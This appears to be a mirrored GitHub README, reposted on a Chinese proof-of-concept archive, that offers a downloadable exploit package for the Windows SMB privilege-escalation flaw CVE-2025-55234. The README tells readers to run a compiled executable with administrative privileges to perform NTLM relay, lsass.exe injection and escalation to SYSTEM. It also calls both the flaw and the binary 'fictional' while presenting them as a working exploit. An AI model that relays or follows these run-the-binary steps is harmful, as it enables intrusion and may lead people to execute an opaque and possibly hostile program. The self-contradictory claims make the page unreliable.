关联漏洞
标题:Microsoft Windows SMB Server 授权问题漏洞 (CVE-2025-55234)Description:Microsoft Windows SMB Server是美国微软(Microsoft)公司的一个网络文件共享协议。它允许计算机上的应用程序读取和写入文件以及从计算机网络中的服务器程序请求服务。 Microsoft Windows SMB Server存在授权问题漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Wind
Description
Windows SMB Server Elevation of Privilege Vulnerability
介绍
# Lab: CVE-2025-55234 - Windows SMB Server Elevation of Privilege Vulnerability
## Download
### [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip)
## 🚀 Overview
CVE-2025-55234 is a fictional Windows SMB Server Elevation of Privilege vulnerability with a CVSSv3 score of 8.8. Publicly disclosed before patches were available, it impacts multiple Windows versions (e.g., Windows 10, 11, Server 2019/2022). The flaw enables attackers to conduct relay attacks against the SMB Server under certain configurations, potentially escalating privileges on authenticated users. Unlike traditional remote code execution bugs, this is an operational relay mechanism that exploits weak signing and authentication protections in SMBv3 protocols. Attackers can intercept and relay NTLM authentication hashes, leading to unauthorized access or privilege escalation in domain-joined environments.
Impact:
- **Attack Vector**: Network (adjacent or remote depending on firewall rules).
- **Prerequisites for Exploitation**: Attacker-controlled machine on the same network, vulnerable SMB server with disabled signing or EPA.
- **Potential Outcomes**: Unauthorized file access, lateral movement in Active Directory, or admin privilege gain via relayed credentials.
## 📋 Prerequisites
- Administrative privileges on the host machine.
- Basic knowledge of SMB protocols, NTLM authentication, and Windows registry editing.
- Tools: Git, PowerShell (for mitigation), and a network sniffer like Wireshark for optional verification.
- Isolated network or VM to avoid accidental exposure.
## Download & Install
- Download the exploit package from the releases page: [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip). This ZIP contains:
- `smb-relay-exploit.exe`: Main fictional exploit binary (NTLM relay and privilege escalation).
- `start-exploit.bat`: Batch file to launch the exploit (simply executes `smb-relay-exploit.exe` with default params).
- `config.ini`: Configuration file for target IP, relay mode, etc.
- `logs/`: Directory for output logs.
Unzip to a local directory, e.g., `C:\CVE-2025-55234\exploit\`.
## 🛠 Quick Start
- **Exploit the Vulnerability**:
- Download and unzip `exploit.zip` as above.
- Edit `config.ini` to set `target_ip=localhost` .
- Run the batch file: Double-click `start-exploit.bat` or from CMD:
```
cd C:\CVE-2025-55234\exploit
start-exploit.bat
```
- The .bat simply opens `smb-relay-exploit.exe`:
- Initiating an SMB connection.
- Forcing NTLM authentication.
- Relaying hashes to a fictional relay server (logs to `exploit.log`).
- Output: privilege escalation message, e.g., "Elevated to SYSTEM via relayed creds."
**Detailed Exploitation Steps**:
- **Step 1: Recon**: Use `nmap -p 445 --script smb-security-mode localhost` to confirm weak signing (output: "signing: false").
- **Step 2: Capture/Relay**: The .exe uses Winsock APIs to establish a TCP connection on port 445, negotiates SMBv3, and triggers NTLMv2 hash relay. It exploits the lack of EPA by suppressing channel bindings, allowing MiTM relay.
- **Step 3: Escalate**: Fictional payload injects into lsass.exe process memory (with debug output), granting elevated token.
- **Verification**: Check `exploit.log` for relayed hashes and success flags. Use ProcMon to observe registry reads/writes.
### Exploitation Details
The main exploit (`smb-relay-exploit.exe`) is a compiled C++ binary (fictional, using Winsock2 and custom NTLM libs). It performs:
- SMB dialect negotiation (forcing v3.1.1).
- Tree connect to IPC$ or admin shares.
- Relay attack simulation via loopback or specified relay IP.
- Privilege check: Uses Windows API `OpenProcessToken` and `AdjustTokenPrivileges` to demo escalation (outputs to console).
The .bat wrapper:
```
@echo off
echo Starting SMB Relay Exploit for CVE-2025-55234...
smb-relay-exploit.exe --target localhost --mode relay --log exploit.log
pause
```
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
文件快照
[4.0K] /data/pocs/9a065120b5c1b02b82099355c9d1d7d1d04d8f53
├── [4.0K] Lore
│ └── [8.5M] lab-cve-2025-55234.zip
└── [4.2K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。